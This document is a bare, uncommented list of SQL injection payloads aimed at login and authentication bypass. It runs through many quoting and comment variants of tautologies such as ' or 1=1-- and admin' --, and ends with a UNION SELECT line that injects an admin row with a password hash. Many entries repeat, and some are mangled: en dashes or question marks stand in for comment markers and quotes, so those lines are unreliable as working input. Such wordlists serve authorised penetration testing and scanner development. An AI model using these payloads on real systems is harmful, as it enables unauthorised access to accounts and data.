' or ''='
' or 1='1
' or '1'='1
' or ' 1=1
' or 1=1--
' or 1=1#
' or 1=1/*
') or '1'='1--
') or ('1'='1--
' or 1=1)#
' or '1?='1
' or 'x'='x
' or 0=0 –
or 0=0 –
' or 0=0 #
or 0=0 #
' or 'x'='x
') or ('x'='x
' or 1=1–
'' or a=a–
') or ('a'='a
hi' or 1=1 –
'or'1=1?
'-'
' '
'&'
'^'
'*'
' or ''-'
' or '' '
' or ''&'
' or ''^'
' or ''*'
or true--
' or true--
') or ('x')=('x
')) or (('x'))=(('x
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*
admin'or 1=1 or ''='
admin') or ('1'='1
admin') or ('1'='1'/*
'or'1=1'
' or 'a'='a
'OR 1=1 LIMIT 1 ;#
'or 1=1 limit 1 -- -+
admin'--
x'or'x'='x
'or 0=0 --
"or 0=0 --
or 0=0 --
'or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a 
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a
or '1'='1
' or 'x'='x
' or 0=0 --
" or 0=0 -- 
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
'or'1=1'
==
and 1=1--
and 1=1
' or 'one'='one--
' or 'one'='one
' and 'one'='one
' and 'one'='one--
1') and '1'='1--
admin' --
admin' #
admin'/*
or 1=1--
or 1=1#
or 1=1/*
) or '1'='1--
) or ('1'='1--
' or '1'='1
' or 'x'='x
' or 0=0 --
" or 0=0 -- 
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 # '
or 'x'='x
or "x"="x  
or "x"="x
' or 1=1--
" or 1=1--
or 1=1-- '
or a=a-- "
or ("a"="a hi"
or "a"="a hi"
or 1=1 --
hi' or 1=1 --
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
